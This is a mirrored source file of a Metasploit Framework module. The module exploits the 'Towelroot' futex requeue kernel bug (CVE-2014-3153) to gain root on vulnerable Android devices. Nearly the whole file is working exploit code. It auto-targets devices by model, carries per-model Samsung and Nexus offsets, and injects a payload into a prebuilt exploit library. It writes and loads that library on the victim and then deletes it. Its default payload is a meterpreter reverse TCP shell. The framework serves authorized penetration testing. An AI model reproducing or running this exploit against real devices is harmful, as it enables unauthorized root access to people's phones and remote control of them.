Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/android/local/futex_requeue.rb
19566 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Msf::Post::File
10
include Msf::Post::Common
11
prepend Msf::Exploit::Remote::AutoCheck
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
{
18
'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",
19
'Description' => %q{
20
This module exploits a bug in futex_requeue in the Linux kernel, using
21
similar techniques employed by the towelroot exploit. Any Android device
22
with a kernel built before June 2014 is likely to be vulnerable.
23
},
24
'License' => MSF_LICENSE,
25
'Author' => [
26
'Pinkie Pie', # discovery
27
'geohot', # towelroot
28
'timwr' # metasploit module
29
],
30
'References' => [
31
[ 'CVE', '2014-3153' ],
32
[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
33
[ 'URL', 'http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability' ],
34
],
35
'DisclosureDate' => '2014-05-03',
36
'SessionTypes' => [ 'meterpreter' ],
37
'Platform' => [ 'android', 'linux' ],
38
'Payload' => { 'Space' => 2048 },
39
'DefaultOptions' => {
40
'WfsDelay' => 300,
41
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
42
},
43
'Notes' => {
44
'Stability' => [CRASH_SAFE],
45
'SideEffects' => [],
46
'Reliability' => [],
47
'AKA' => ['towelroot']
48
},
49
'DefaultTarget' => 0,
50
'Targets' => [
51
# Automatic targetting via getprop ro.build.model
52
['Automatic Targeting', { 'auto' => true }],
53
54
# This is the default setting, Nexus 4, 5, 7, etc
55
[
56
'Default',
57
{
58
'new_samsung' => false,
59
'iovstack' => 2,
60
'offset' => 0,
61
'force_remove' => false
62
}
63
],
64
65
# Samsung devices, S3, S4, S5, etc
66
[
67
'New Samsung',
68
{
69
'new_samsung' => true,
70
'iovstack' => 2,
71
'offset' => 7380,
72
'force_remove' => true
73
}
74
],
75
76
# Older Samsung devices, e.g the Note 2
77
[
78
'Old Samsung',
79
{
80
'new_samsung' => false,
81
'iovstack' => 1,
82
'offset' => 0,
83
'force_remove' => true
84
}
85
],
86
87
# Samsung Galaxy Grand, etc
88
[
89
'Samsung Grand',
90
{
91
'new_samsung' => false,
92
'iovstack' => 5,
93
'offset' => 0,
94
'force_remove' => true
95
}
96
],
97
],
98
'Compat' => {
99
'Meterpreter' => {
100
'Commands' => %w[
101
core_loadlib
102
stdapi_fs_delete_file
103
stdapi_fs_getwd
104
]
105
}
106
}
107
}
108
)
109
)
110
end
111
112
def check
113
os = cmd_exec('getprop ro.build.version.release')
114
unless Rex::Version.new(os) < Rex::Version.new('4.5.0')
115
vprint_error "Android version #{os} does not appear to be vulnerable"
116
return CheckCode::Safe
117
end
118
vprint_good "Android version #{os} appears to be vulnerable"
119
120
CheckCode::Appears
121
end
122
123
def exploit
124
if target['auto']
125
product = cmd_exec('getprop ro.build.product')
126
fingerprint = cmd_exec('getprop ro.build.fingerprint')
127
print_status("Found device: #{product}")
128
print_status("Fingerprint: #{fingerprint}")
129
130
if [
131
'mako',
132
'm7',
133
'hammerhead',
134
'grouper',
135
'Y530-U00',
136
'G6-U10',
137
'g2',
138
'w7n',
139
'D2303',
140
'cancro',
141
].include? product
142
my_target = targets[1] # Default
143
elsif [
144
'klte', # Samsung Galaxy S5
145
'jflte', # Samsung Galaxy S4
146
'd2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
147
].include? product
148
my_target = targets[2] # New Samsung
149
elsif [
150
't03g',
151
'm0',
152
].include? product
153
my_target = targets[3] # Old Samsung
154
elsif [
155
'baffinlite',
156
'Vodafone_785',
157
].include? product
158
my_target = targets[4] # Samsung Grand
159
else
160
print_status("Could not automatically target #{product}")
161
my_target = targets[1] # Default
162
end
163
else
164
my_target = target
165
end
166
167
print_status("Using target: #{my_target.name}")
168
169
local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')
170
exploit_data = File.read(local_file, mode: 'rb')
171
172
# Substitute the exploit shellcode with our own
173
space = payload_space
174
payload_encoded = payload.encoded
175
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
176
177
# Apply the target config
178
offsets = my_target.opts
179
config_buf = [
180
offsets['new_samsung'] ? -1 : 0,
181
offsets['iovstack'].to_i,
182
offsets['offset'].to_i,
183
offsets['force_remove'] ? -1 : 0,
184
].pack('I4')
185
exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)
186
187
workingdir = session.fs.dir.getwd
188
remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
189
write_file(remote_file, exploit_data)
190
191
print_status("Loading exploit library #{remote_file}")
192
session.core.load_library(
193
'LibraryFilePath' => local_file,
194
'TargetFilePath' => remote_file,
195
'UploadLibrary' => false,
196
'Extension' => false,
197
'SaveToDisk' => false
198
)
199
print_status("Loaded library #{remote_file}, deleting")
200
session.fs.file.rm(remote_file)
201
print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
202
end
203
end
204
205